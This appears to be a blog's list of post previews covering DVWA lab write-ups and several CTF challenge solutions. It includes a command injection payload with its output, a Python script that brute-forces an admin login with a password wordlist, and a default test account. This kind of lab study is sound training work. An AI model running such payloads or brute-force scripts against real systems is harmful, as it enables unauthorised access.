Posts

Description Vulnerability: Cryptography Impact: Decode the encoded string to get the correct password. LOW Security Level In the source code this is how decoding process works: $decoded = xor_this (base64_decode ($password), $key); First Base64 Decode the password then decode with XOR and the key is wachtwoord. I use CyberChef to decode this encoded string: Result: Your new password is: Olifant MEDIUM Security Level The tokens are encrypted using an Electronic Code Book based algorithm (AES-128-ECB). aes-128-ebc is a 128 bit block cipher. 128 bits is 16 bytes, but to make things human readable, the bytes are represented as hex characters meaning each byte is two characters. This gives you a block size of 32 characters. ...

Description Vulnerability: Command injection Impact: Get access to server resources through ping function. LOW Security Level This LOW level ping function doesn’t have any filter or regex to check the input we enter for them. Therefore, we can leverage this vulnerability to execute additional commands to the server. Example: 1.1.1.1; id This payload will ping 1.1.1.1 but also run id. The result is: PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data. 64 bytes from 1.1.1.1: icmp_seq=1 ttl=52 time=63.0 ms 64 bytes from 1.1.1.1: icmp_seq=2 ttl=52 time=93.5 ms 64 bytes from 1.1.1.1: icmp_seq=3 ttl=52 time=76.8 ms 64 bytes from 1.1.1.1: icmp_seq=4 ttl=52 time=50.4 ms --- 1.1.1.1 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 3005ms rtt min/avg/max/mdev = 50.401/70.910/93.461/16.016 ms uid=33(www-data) gid=33(www-data) groups=33(www-data) ...

Description Vulnerability: Brute-force Impact: Brute-force and get the admin account credentials. LOW Security Level This is the simple code I created to brute-force the admin account using rockyou.txt password lists. Change PHPSESSID to your own one. import requests baseUrl = "http://localhost/DVWA/vulnerabilities/brute/?Login=Login&username=admin" cookies = { "PHPSESSID": "91fdcd96e5376633ef607edd0a1b8093", "security": "low" } try: with open('/usr/share/wordlists/rockyou.txt') as file: for line in file: password = line.rstrip() url = baseUrl + f"&password={password}" try: print(f"Attempting: password={password}") res = requests.get(url, cookies=cookies) if "Username and/or password incorrect." not in res.text: print() print("=> Password found: ", password) exit() except requests.exceptions.RequestException as e: print("Request error:", e) continue except FileNotFoundError as e: print("File not found:", e) MEDIUM Security Level The only difference between LOW and MEDIUM level is in the Login failed if logic: ...

Description Vulnerability: Authorisation Bypass Impact: Leveraging vulnerabilities to get access to user manager system. LOW Security Level The source code doesn’t have any checks. You can use gordonb / abc123 this account (this is not an admin account). Since the source code doesn’t have any checks so we can just access to the URL: http://localhost/DVWA/vulnerabilities/authbypass/ MEDIUM Security Level The source code now updated with a check: /* Only the admin user is allowed to access this page. Have a look at these two files for possible vulnerabilities: * vulnerabilities/authbypass/get_user_data.php * vulnerabilities/authbypass/change_user_details.php */ if (dvwaCurrentUser() != "admin") { print "Unauthorised"; http_response_code(403); exit; } Let’s take a look at those 2 files, visit get_user_data.php we got: ...

DVWA’s CSRF Challenge This challenge works around a password reset form, enabling admin to change their password. The first three levels can be exploited with these solutions: LOW Security Level: we just need a URL with correct params setup, from that URL make a GET request and we can change the password. MEDIUM Security Level: this level adds a check of Referer header, since it should be the same as where the request originated from, a simple curl command may exploit this level. HIGH Security Level: this is where the game plays, it needs a CSRF token for every request to change the password. This is not so hard to exploit - a Python script can exploit it. For more information: https://github.com/jameskaois/dvwa-vulnerabilities/tree/main/csrf ...

Room / Challenge: Wave Second For Git (Misc) Metadata Author: jameskaois CTF: WannaGame Freshman CTF 2025 Challenge: Wave Second For Git (Misc) Difficulty: Medium Points: 451 Solves: 8 Date: 06-10-2025 Goal We have to get the flag by using Git cli. My Solution Here is the source, you can download it here There is the flag.txt with this content: VzF7ZzF0aHViXw== It is encoded with base64 algorithm, it is easy to decode it, result is the first part of the flag: ...

Room / Challenge: Open Read Flag (Web) Metadata Author: jameskaois CTF: WannaGame Freshman CTF 2025 Challenge: Open Read Flag (web) Target / URL: http://61.28.236.247:10000/ Difficulty: Medium Points: 484 Solves: 5 Date: 06-10-2025 Goal We have to get the flag by leveraging the view file functionality. My Solution Here is the source code, you can download and examine it here The website is simple with just a read file functionality. ...

Room / Challenge: Admin Tồi (Web) Metadata Author: jameskaois CTF: WannaGame Freshman CTF 2025 Challenge: Admin Tồi (web) Target / URL: http://61.28.236.247:9000/ Difficulty: Medium Points: 419 Solves: 10 Date: 06-10-2025 Goal We have to get the flag by leveraging the vuln in authentication feature My Solution Here is the source code, you can download and examine it here This is the home page of the website. Let’s try creating an account and logging in to it to see what we got. ...

Room / Challenge: Intergalactic Webhook Service (Web) Metadata Author: jameskaois CTF: SunShine CTF 2025 Challenge: Intergalactic Webhook Service (web) Target / URL: https://supernova.sunshinectf.games/ Difficulty: Easy Points: 10 Date: 01-10-2025 Goal We have to get the flag by leveraging the vuln in webhook service. My Solution Here is the source code, you can download it here. The backend has this vulnerable code: def is_ip_allowed(url): parsed = urlparse(url) host = parsed.hostname or '' try: ip = socket.gethostbyname(host) except Exception: return False, f'Could not resolve host' ip_obj = ipaddress.ip_address(ip) if ip_obj.is_private or ip_obj.is_loopback or ip_obj.is_link_local or ip_obj.is_reserved: return False, f'IP "{ip}" not allowed' return True, None This code takes the URL, if hostnames -> IP address using the DNS. If IP is private (like 192.168.x.x), loopback (127.0.0.1) it will be blocked. ...

Room / Challenge: Lunar File Invasion (Web) Metadata Author: jameskaois CTF: SunShine CTF 2025 Challenge: Lunar File Invasion (web) Target / URL: https://asteroid.sunshinectf.games Difficulty: Medium / Hard Points: 463 Date: 30-09-2025 Goal We have to get the flag by getting admin authentication and leveraging vulnerability. My Solution There are no routes in the home page that we can visit normally. Visit /robots.txt we can see the content: ...